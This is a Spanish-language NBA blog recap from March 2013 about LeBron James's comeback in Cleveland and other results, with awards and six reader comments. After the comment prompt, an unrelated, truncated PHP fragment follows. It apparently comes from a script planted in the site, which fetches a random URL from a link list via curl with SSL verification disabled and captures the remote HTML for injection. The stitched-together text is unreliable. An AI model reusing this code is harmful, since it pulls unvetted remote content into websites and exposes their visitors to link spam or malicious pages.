La Crónica: No hay lugar seguro

21 de March de 2013 por Simon

Así se deben sentir todos los jugadores de la NBA. Ya no hay lugar seguro para ellos, el depredador Lebron James deja todo hecho un solar haya por donde pasa. Ayer visitaba Cleveland, donde por cierto parece que le han comenzado a perdonar o así me lo pareció a mí con el recibimiento que tuvo ayer.  En la primera parte los Cavs elevaban sus ventajas por encima de los 20 puntos y rozaron los 30 de superávit en algunos momentos del tercer cuarto. Pero con Lebron nunca puedes dar un partido por controlado pues en cualquier momento puede decidir que tus opciones han terminado. Fue lo que ocurrió en los últimos 15 minutosde partido. Cleveland nada pudo hacer ante semejante vendaval, bastante aguantaron incluso teniendo opciones de mandar el partido a la prórroga hasta el último segundo (98-95). Hagamos recuento: quedan 15 minutos para el final del partido, tenemos a James con 9 puntos, 3 rebotes y 5 asistencias, pues bien, al terminar el encuentro la tarjeta de estadísticas de Lebron mostraba 25 puntos, 12 rebotes y 10 asistencias. Absolutamente brutal.

El máximo rival a priori que puede tener Miami y Lebron en su camino al título sigue sembrando dudas en estas últimas fechas. Ayer Oklahoma perdió su segundo partido consecutivo y lo hizo en el FedExForum de Memphis. El partido fue muy igualado en todos sus compases, a un ritmo lento con las defensas imponiéndose a los ataques como le gusta a Memphis. Aún así, a punto estuvo Oklahoma de llevarse el partido. Por suerte para Memphis ayer contaban con un Bayless desatado autor de 20 puntos y del triple que mandó a la prórroga el partido. En la prórroga, Gasol anotó 5 de los 7 puntos de su equipo y el palmeo final sobre la bocina para ganar el encuentro y mantener su posición de tercer clasificado (89-90). Gasol y Randolph fueron los amos y señores del partido ayer y se combinaron para 33 rebotes y 29 puntos entre ambos.  Preocupados deben estar en Oklahoma. La derrota podría ser hasta normal ante Memphis en su casa pero lo que sí que crea dudas es lo solos que están Durant y Westbrook. En partidos complicados nadie, absolutamente nadie es capaz de ayudarles. A día de hoy no creo que sean tan favoritos como al inicio de temporada en el Oeste. Con la victoria, los Grizzlies mantienen distancias con los Clippers que dieron un buen repaso a los Sixers (72-101) de la mano de un  gran Chris Paul que terminó el partido con 19 puntos, 9 rebotes, 6 asistencias y 5 robos. 

San Antonio, líder del Oeste, tenía ayer un encuentro incómodo ante Golden State Warriors que superaron con más facilidad de la esperada. El partido se rompió en el segundo cuarto y a partir de ahí se dedicaron a administrar una ventaja que nunca se vio realmente comprometida (93-104). Otro gran partido de Duncan que logró 25 puntos, 13 rebotes a los que añadió 6 asistencias.  Terminando con los equipos de Play Off del Oeste, ayer teníamos un encuentro interesantísimo en la lucha por entrar en ellos con la visita de Utah Jazz a Houston.  El partido no tuvo historia pues desde el principio Houston tuvo cómodas ventajas que le hicieron no pasar apuros a pesar de la reacción de Utah en el último cuarto. Gran partido de la dupla Harden-Lin, 29 puntos para el primero y 24 puntos y 6 asistencias para el segundo (93-100).

New York venció sin mayores problemas a Orlando Magic en el retorno de Anthony (94-106).  No necesitaron exprimirse al máximo los jugadores de los Knicks pues el partido se les puso de cara desde el inicio. Carmelo fue el mejor en su regreso a la acción con 21 puntos, aunque el máximo anotador fue JR Smith con 22 puntos y que cada vez que juega se postula definitivamente para el premio a mejor sexto hombre de la temporada.

En la batalla por ascender puestos en el Este, ayer Boston dio un paso atrás cayendo en New Orleans. Tras ir todo el encuentro por delante, un fatídico tercer cuarto de los de Rivers metió en el partido a New Orleans. El último cuarto fue un intercambio constante de golpes con el marcador siempre igualado. En la última jugada Eric Gordon forzó una penetración que falló pero Anthony Davis pudo palmear el balón para dar la victoria a su equipo (86-87).  Los mejores Hornets fueron Vásquez con  13 puntos, 7 rebotes y 6 asistencias y sobretodo Anderson con 21 puntos desde el banquillo. Por su parte, Atlanta venció en casa a Milwaukee Bucks de la mano de Al Horford y Jeff Teague que con 26 puntos y 15 rebotes y 27 puntos y 11 asistencias respectivamente llevaron a los Hawks a conseguir una importante victoria para seguir distanciando a Chicago y Boston en la lucha por el quinto puesto de la conferencia (90-98).

En el resto de la jornada, Brooklyn venció a Dallas con una exhibición de sus interiores, 38 puntos para  Brook López y 22 rebotes para Reggie Evans (113-96). Washington venció en Phoenix en un feo y aburrido partido (88-79) y Charlotte venció en casa a los Raptors con un partidazo de Mullens (101-107)

PREMIOS

MVP: Exhibición ante los Mavs de Brook Lopez, autor de 38 puntos, 11 rebotes y 2 tapones. Tampoco podemos dejar de destacar a Tim “Eterno” Duncan con 25 puntos, 13 rebotes, 6 asistencias y 4 tapones, ni a Lebron James que consiguió un triple-doble en la remontada de los Heat ante los Cavs.

Rookie: Jonas Valanciunas anotó 18 puntos, capturó 8 rebotes y además robó un par de balones, puso un par de pinchos de merluza y repartió 2 asistencias. Una actuación muy completa.

Sorpresa: Minutos para Wayne Ellington y correcta actuación: 20 puntos, 7 rebotes y 4 asistencias. A BJ Mullens le salió el partido bueno y se fue a los 25 puntos.

Decepción: Monta Ellis es capaz de lo mejor y de lo peor. Si hace unos días se iba a los 25 puntos en el último cuarto, ayer nos dejó una terrible actuación. Se quedó en 5 puntos tras fallar 12 de sus 14 lanzamientos a canasta y no fue capaz de aportar en ningún apartado del juego.

Esfuerzo en vano: Los 28 puntos de Paul Pierce no sirvieron para amarrar la victoria ante los Hornets por culpa de Anthony Davis. Gordon Hayward anotó 27 y tampoco encontró recompensa.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Cito mi comentario del lunes, porque vale para hoy:

    “Lo de los últimos cuartos de los Heat (y en concreto de LeBron) es una cosa brutal, dan la impresión de que no hay renta suficiente ante ellos, que siempre van a ser capaces de remontar como si nada.”

      Citar

  2. txusma dice:
    #2

    MagicJohnson32:
    Cito mi comentario del lunes, porque vale para hoy:

    “Lo de los últimos cuartos de los Heat (y en concreto de LeBron) es una cosa brutal, dan la impresión de que no hay renta suficiente ante ellos, que siempre van a ser capaces de remontar como si nada.”

    Pq Lebron era ese jugador en el que no se podía confiar en los últimos cuartos, verdad?

      Citar

  3. Ruxixón dice:
    #3

    “El Show de Cleveland”

    El partido de ayer demuestra que LeBron quiere ese récord de los Lakers pero también indice en la cantidad de veces que Miami se relaja contra los equipos más flojos.Vamos a ver dónde queda la marca.

      Citar

  4. Esteban dice:
    #4

    a lebron le estan faltando algunos hitos o records, no tiene 33 vicotrias consecutivas, ni 81 puntos, ni 9 puntos en unos segunos ni 6 anillos

    pero de a poco empieza a acallar cualquier minima duda, tendra este mismo año 2 anillos y si logra quedarse con el record de mas de 33 victorias, estaremos hablando de sin dudas el mejor alero de todos lo tiempos

    habra que ver hasta donde aguanta su fisico para superar a jordan

    es cuestion de tiempo

      Citar

  5. MagicJohnson32 dice:
    #5

    txusma: Pq Lebron era ese jugador en el que no se podía confiar en los últimos cuartos, verdad?

    De los creadores de “Kobe nunca ganará un anillo sin Shaq” xD

    Por cierto, Simon, me ha gustado mucho el título de la crónica.

      Citar

  6. Esteban dice:
    #6

    MagicJohnson32: De los creadores de “Kobe nunca ganará un anillo sin Shaq” xD

    Por cierto, Simon, me ha gustado mucho el título de la crónica.

    no habra quien diga en unos años que lebron no podia ganar un titulo sin wade al lado

    no nos olvidemos que wade es una MVP de finales y campeon de la nba antes de cruzarse con lebron

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>